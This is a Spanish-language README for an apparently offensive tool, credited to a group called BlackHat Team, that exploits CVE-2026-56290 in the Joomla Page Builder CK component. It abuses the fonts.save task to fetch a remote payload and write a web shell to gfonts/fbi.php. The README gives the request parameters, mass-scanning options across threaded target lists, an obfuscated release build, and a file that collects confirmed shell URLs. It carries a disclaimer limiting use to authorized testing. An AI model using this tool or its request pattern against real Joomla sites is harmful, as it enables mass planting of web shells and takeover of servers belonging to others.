
Page Builder CK para Joomla - Explotador de SSRF no autenticado / Escritura remota de archivos que conduce a la ejecución de PHP
BlackHat Team escáner de prueba de concepto para la vulnerabilidad fonts.save del componente Page Builder CK de Joomla.
POC CVE-2026-56290
Autor: @mrzblackhat
Equipo: BlackHat Team
Créditos: Peyman Siyahi · MR.PERSIA
Esta herramienta sondea sitios Joomla que ejecutan el componente vulnerable com_pagebuilderck. Abusa de la tarea fonts.save para descargar un payload remoto y escribe un web shell en:
media/com_pagebuilderck/gfonts/fbi.php
El RCE se confirma cuando el shell subido responde con un <title> HTML que contiene Fbi Shell.
Admite escaneo de objetivo único y masivo con workers en hilos y guardado instantáneo de aciertos.
requestsurllib3pip install requests urllib3
python3 poc.py --url https://example.com --insecure
python3 poc.py --mass targets.txt --insecure --threads 20 --timeout 12
targets.txt — una URL por línea. Las líneas después de # se ignoran.
Fbi ShellLas URLs de shell confirmadas se añaden al archivo de salida inmediatamente.
| Archivo | Descripción |
|---|---|
poc.py | Build de lanzamiento ofuscado (ejecuta este) |
hits.txt | Salida predeterminada para shells confirmados |
python3 _build_obf.py
POST a index.php con option=com_pagebuilderck&task=fonts.savefont.css activa la escritura del shell en gfonts/fbi.phpGET la ruta del shell y verificar que el <title> contiene Fbi ShellEsta herramienta se proporciona únicamente para investigación de seguridad autorizada y pruebas de penetración.
El acceso no autorizado a sistemas informáticos es ilegal. Los autores y BlackHat Team no son responsables del mal uso. Solo pruebe sistemas que le pertenezcan o para los que tenga permiso escrito explícito de evaluación.
@mrzblackhatBlackHat Team — Peyman Siyahi · MR.PERSIA
Investigación y herramientas originales por @mrzblackhat. No redistribuya copias modificadas sin atribución.
| Flag | Descripción |
|---|
--url URL | Escanear un objetivo único |
--mass FILE | Escanear objetivos desde un archivo |
--insecure | Omitir la verificación del certificado TLS |
--threads N | Hilos de trabajo para modo masivo (predeterminado: 20) |
--timeout N | Tiempo de espera HTTP en segundos (predeterminado: 12) |
--output FILE | Guardar URLs de shell confirmadas (predeterminado: hits.txt) |